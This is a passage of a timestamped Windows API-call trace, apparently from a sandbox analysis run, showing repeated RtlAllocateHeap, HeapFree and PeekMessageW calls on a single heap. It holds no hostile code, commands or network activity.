Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.635] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.635] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.635] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.635] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.635] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.636] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.636] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.636] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.636] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.636] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.637] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.637] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.637] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.637] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.637] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.638] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.638] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.638] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.638] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.638] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.639] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.639] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.639] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.639] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.639] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.640] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.640] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.640] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.641] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.641] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.641] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.641] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.641] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.641] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.642] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.642] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.642] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.642] HeapFree (in: 